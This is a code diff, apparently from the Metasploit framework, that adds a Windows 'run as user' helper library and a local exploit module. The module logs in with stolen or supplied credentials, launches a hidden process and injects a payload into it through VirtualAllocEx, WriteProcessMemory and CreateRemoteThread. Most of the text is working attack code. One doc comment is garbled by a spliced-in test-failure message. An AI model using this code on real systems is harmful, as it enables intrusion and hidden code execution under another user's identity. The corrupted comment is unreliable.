sempervictus
diff --git a/‎lib/msf/core/post/windows/runas.rb
Lines changed: 219 additions & 0 deletions b/‎lib/msf/core/post/windows/runas.rb
Lines changed: 219 additions & 0 deletions
diff --git a/‎modules/exploits/windows/local/run_as.rb
Lines changed: 126 additions & 0 deletions b/‎modules/exploits/windows/local/run_as.rb
Lines changed: 126 additions & 0 deletions
@@ -8,6 +8,12 @@ module Msf::Post::Windows::Runas
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Error
+
+  ERROR = Msf::Post::Windows::Error
+  MAX_PATH = 260
+  STARTF_USESHOWWINDOW = 0x00000001
+  SW_HIDE = 0
 
   def shell_execute_exe(filename = nil, path = nil)
     exe_payload = generate_payload_exe
@@ -34,4 +40,217 @@ def shell_exec(command, args)
       select(nil, nil, nil, 1) until session_created?
     end
   end
+
+  #
+  # Create a STARTUP_INFO struct for use with CreateProcessA
+  #
+  # This struct will cause the process to be hidden
+  #
+  # @return [String] STARTUP_INFO struct
+  #
+  def startup_info
+    [0, # cb
+     0, # lpReserved
+     0, # lpDesktop
+     0, # lpTitle
+     0, # dwX
+     0, # dwY
+     0, # dwXSize
+     0, # dwYSize
+     0, # dwXCountChars
+     0, # dwYCountChars
+     0, # dwFillAttribute
+     STARTF_USESHOWWINDOW, # dwFlags
+     SW_HIDE, # wShowWindow
+     0, # cbReserved2
+     0, # lpReserved2
+     0, # hStdInput
+     0, # hStdOutput
+     0  # hStdError
+    ].pack('VVVVVVVVVVVVvvVVVV')
+  end
+
+  #
+  # Call CreateProcessWithLogonW to start a process with the supplier
+  # user credentials
+  #
+  # @note The caller should clear up the handles returned in
+  #   the PROCESS_INFORMATION @return hash.
+  #
+  # @param domain [String] The target user domain
+  # @param user [String] The target user
+  # @param password [String] The target user password
+  # @param application_name [String] The executable to be run, can be
+  #   nil
+  # @param command_line [String] The command line or process arguments
+  #
+  # @return [Hash, nil] The values from the process_information struct
+  #
+  def create_process_with_logon(domain, user, password, application_name, command_line)
+    return unless check_user_format(user, domain)
+    return unless check_command_length(application_name, command_line, 1024)
+
+    vprint_status("Executing CreateProcessWithLogonW: #{application_name} #{command_line}...")
+    create_process = session.railgun.advapi32.CreateProcessWithLogonW(user,
+                                                                      domain,
+                                                                      password,
+                                                                      'LOGON_WITH_PROFILE',
+                                                                      application_name,
+                                                                      command_line,
+                                                                      'CREATE_UNICODE_ENVIRONMENT',
+                                                                      nil,
+                                                                      nil,
+                                                                      startup_info,
+                                                                      16)
+    if create_process['return']
+      pi = parse_process_information(create_process['lpProcessInformation'])
+      print_good("Process started successfully, PID: #{pi[:process_id]}")
+    else
+      print_error("Unable to create process, Error Code: #{create_process['GetLastError']} - #{create_process['ErrorMessage']}")
+      print_error("Try setting the DOMAIN or USER in the format: user@domain") if create_process['GetLastError'] == 1783 && domain.nil?
+    end
+
+    pi
+  end
+
+  #
+  # Call CreateProcessAsUser to start a process with the supplier
+  # user credentials
+  #
+  # Can be used by SYSTEM processes with the SE_INCREASE_QUOTA_NAME and
+  # SE_ASSIGNPRIMARYTOKEN_NAME privileges.
+  #
+  # This will normally error with 0xc000142 on later OS's (Vista+?) for
+  # gui apps but is ok for firing off cmd.exe...
+  #
+  # @param domain [String] The target user domain
+  # @param user [String] The target user
+  # @param password [String] The target user password
+  # @param application_name [String] Thn executableived :CloseHandle
+  # with unexpected arguments
+  #          expected: ("testPhToken")
+  #                        got: (n be run, can be
+  #   nil
+  # @param command_line [String] The command line or process arguments
+  #
+  # @return [Hash, nil] The values from the process_information struct
+  #
+  def create_process_as_user(domain, user, password, application_name, command_line)
+    return unless check_user_format(user, domain)
+    return unless check_command_length(application_name, command_line, 32000)
+
+    vprint_status("Executing LogonUserA...")
+    logon_user = session.railgun.advapi32.LogonUserA(user,
+                                                     domain,
+                                                     password,
+                                                     'LOGON32_LOGON_INTERACTIVE',
+                                                     'LOGON32_PROVIDER_DEFAULT',
+                                                     4)
+
+    if logon_user['return']
+      begin
+        ph_token = logon_user['phToken']
+        vprint_status("Executing CreateProcessAsUserA...")
+        create_process = session.railgun.advapi32.CreateProcessAsUserA(ph_token,
+                                                                      application_name,
+                                                                      command_line,
+                                                                      nil,
+                                                                      nil,
+                                                                      false,
+                                                                      'CREATE_NEW_CONSOLE',
+                                                                      nil,
+                                                                      nil,
+                                                                      startup_info,
+                                                                      16)
+
+        if create_process['return']
+          begin
+            pi = parse_process_information(create_process['lpProcessInformation'])
+          ensure
+            session.railgun.kernel32.CloseHandle(pi[:process_handle])
+            session.railgun.kernel32.CloseHandle(pi[:thread_handle])
+          end
+          print_good("Process started successfully, PID: #{pi[:process_id]}")
+        else
+          print_error("Unable to create process, Error Code: #{create_process['GetLastError']} - #{create_process['ErrorMessage']}")
+        end
+
+        return pi
+      ensure
+        session.railgun.kernel32.CloseHandle(ph_token)
+      end
+    else
+      print_error("Unable to login the user, Error Code: #{logon_user['GetLastError']} - #{logon_user['ErrorMessage']}")
+    end
+
+    nil
+  end
+
+  #
+  # Parse the PROCESS_INFORMATION struct
+  #
+  # @param process_information [String] The PROCESS_INFORMATION value
+  #   from the CreateProcess call
+  #
+  # @return [Hash] The values from the process_information struct
+  #
+  def parse_process_information(process_information)
+    fail ArgumentError, 'process_information is nil' if process_information.nil?
+    fail ArgumentError, 'process_information is empty string' if process_information.empty?
+
+    pi = process_information.unpack('VVVV')
+    { :process_handle => pi[0], :thread_handle => pi[1], :process_id => pi[2], :thread_id => pi[3] }
+  end
+
+  #
+  # Checks the username and domain is in the correct format
+  # for the CreateProcess_x WinAPI calls.
+  #
+  # @param username [String] The target user
+  # @param domain [String] The target user domain
+  #
+  # @raise [ArgumentError] If the username format is incorrect
+  #
+  # @return [True] True if username is in the correct format
+  #
+  def check_user_format(username, domain)
+    fail ArgumentError, 'username is nil' if username.nil?
+
+    if domain && username.include?('@')
+      raise ArgumentError, 'Username is in UPN format (user@domain) so the domain parameter must be nil'
+    end
+
+    true
+  end
+
+  #
+  # Checks the command_length parameter is the correct length
+  # for the CreateProcess_x WinAPI calls depending on the presence
+  # of application_name
+  #
+  # @param application_name [String] lpApplicationName
+  # @param command_line [String] lpCommandLine
+  # @param max_length [Integer] The max command length of the respective
+  #   CreateProcess function
+  #
+  # @raise [ArgumentError] If the command_line is too large
+  #
+  # @return [True] True if the command_line is within the correct bounds
+  #
+  def check_command_length(application_name, command_line, max_length)
+    fail ArgumentError, 'max_length is nil' if max_length.nil?
+
+    if application_name.nil? && command_line.nil?
+      raise ArgumentError, 'Both application_name and command_line are nil'
+    elsif command_line && command_line.length > max_length
+      raise ArgumentError, "Command line must be less than #{max_length} characters (Currently #{command_line.length})"
+    elsif application_name.nil? && command_line
+      cl = command_line.split(' ')
+      if cl[0] && cl[0].length > MAX_PATH
+        raise ArgumentError, "When application_name is nil the command line module must be less than MAX_PATH #{MAX_PATH} characters (Currently #{cl[0].length})"
+      end
+    end
+
+    true
+  end
 end
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  include Msf::Post::Windows::Runas
+  include Msf::Post::Windows::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                 => "Windows Run Command As User",
+      'Description'          => %q{
+        This module will login with the specified username/password and execute the
+        supplied command as a hidden process. Output is not returned by default.
+        Unless targetting a local user either set the DOMAIN, or specify a UPN user
+        format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.
+
+        A custom command line can be sent instead of uploading an executable.
+        APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine
+        respectively. See the MSDN documentation for how these two values interact.
+      },
+      'License'              => MSF_LICENSE,
+      'Platform'             => ['win'],
+      'SessionTypes'         => ['meterpreter'],
+      'Author'               => ['Kx499', 'Ben Campbell'],
+      'Targets'              => [
+        [ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ]
+      ],
+      'DefaultTarget'        => 0,
+      'References'           =>
+        [
+          [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ]
+        ],
+      'DisclosureDate' => 'Jan 01 1999' # Not valid but required by msftidy
+    ))
+
+    register_options(
+      [
+        OptString.new('DOMAIN', [false, 'Domain to login with' ]),
+        OptString.new('USER', [true, 'Username to login with' ]),
+        OptString.new('PASSWORD', [true, 'Password to login with' ]),
+        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]),
+        OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]),
+        OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ])
+      ], self.class)
+  end
+
+  def exploit
+    fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter'
+    fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system?
+    domain = datastore['DOMAIN']
+    user = datastore['USER']
+    password = datastore['PASSWORD']
+
+    if datastore['USE_CUSTOM_COMMAND']
+      application_name = datastore['APPLICATION_NAME']
+      command_line = datastore['COMMAND_LINE']
+    else
+      command_line = nil
+      windir = get_env('windir')
+
+      # Select path of executable to run depending the architecture
+      case sysinfo['Architecture']
+      when /x86/i
+        application_name = "#{windir}\\System32\\notepad.exe"
+      when /x64/i
+        application_name = "#{windir}\\SysWOW64\\notepad.exe"
+      end
+    end
+
+    pi = create_process_with_logon(domain,
+                                   user,
+                                   password,
+                                   application_name,
+                                   command_line)
+
+    return unless pi
+
+    begin
+      return if datastore['USE_CUSTOM_COMMAND']
+
+      vprint_status('Injecting payload into target process')
+      raw = payload.encoded
+
+      process_handle = pi[:process_handle]
+
+      virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle,
+                                                              nil,
+                                                              raw.length,
+                                                              'MEM_COMMIT|MEM_RESERVE',
+                                                              'PAGE_EXECUTE_READWRITE')
+
+      address = virtual_alloc['return']
+      fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0
+
+      write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle,
+                                                                address,
+                                                                raw,
+                                                                raw.length,
+                                                                4)
+
+      fail_with(Exploit::Failure::Unknown,
+                "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return']
+
+      create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle,
+                                                                        nil,
+                                                                        0,
+                                                                        address,
+                                                                        nil,
+                                                                        0,
+                                                                        4)
+      if create_remote_thread['return'] == 0
+        print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}")
+      else
+        print_good("Started thread in target process")
+      end
+    ensure
+      session.railgun.kernel32.CloseHandle(pi[:process_handle])
+      session.railgun.kernel32.CloseHandle(pi[:thread_handle])
+    end
+  end
+end